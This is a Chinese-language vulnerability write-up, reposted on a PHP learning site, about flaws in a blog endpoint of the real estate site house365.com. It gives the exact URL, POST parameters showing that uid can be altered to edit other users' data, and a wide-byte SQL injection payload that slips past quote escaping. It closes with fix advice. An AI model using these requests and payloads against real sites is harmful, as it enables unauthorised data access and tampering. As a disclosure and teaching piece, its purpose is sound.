网站地图    收藏   

主页 > 后端 > 网站安全 >

365房产网一个设置泄露+越权+注入 - 网站安全 -

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] http://blog.house365.com/ajaxuser.php?type=blogaction=atcblogclassjob=addUPDATE pw_userinfo SET dirdb=......................发送数据:blogclass=AAAAAAAAAAAAAAAAA\itemid=1uid=1name=注意了哦......

http://blog.house365.com/ajaxuser.php?type=blog&action=atcblogclass&job=add

UPDATE pw_userinfo SET dirdb=......................


发送数据:

blogclass=AAAAAAAAAAAAAAAAA"\&itemid=1&uid=1&name=


注意了哦uid可以随便修改


修改了uid为1用户的博客标签。

gpc开启无法注入? 宽字节帮助你!

blogclass=007&itemid=1&uid=1%df'--&name=

 


WHERE uid='1€€'#'
呵呵闭合了呢。。。
  

修改了uid为5用户的博客标签。

 

 gpc开启无法注入? 宽字节帮助你!

blogclass=007&itemid=1&uid=1%df'--&name=

 

 


WHERE uid='1€€'#'
呵呵闭合了呢。。。这个是主站注入哦。。。。全部用户的数据在。
修复方案:
uid的SESSION或者cookies验证下.

宽字节注入:

介个建议使用mysql_set_charset设置字符集 mysql_real_escape_string 转义sql语句

字符集为二进制

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论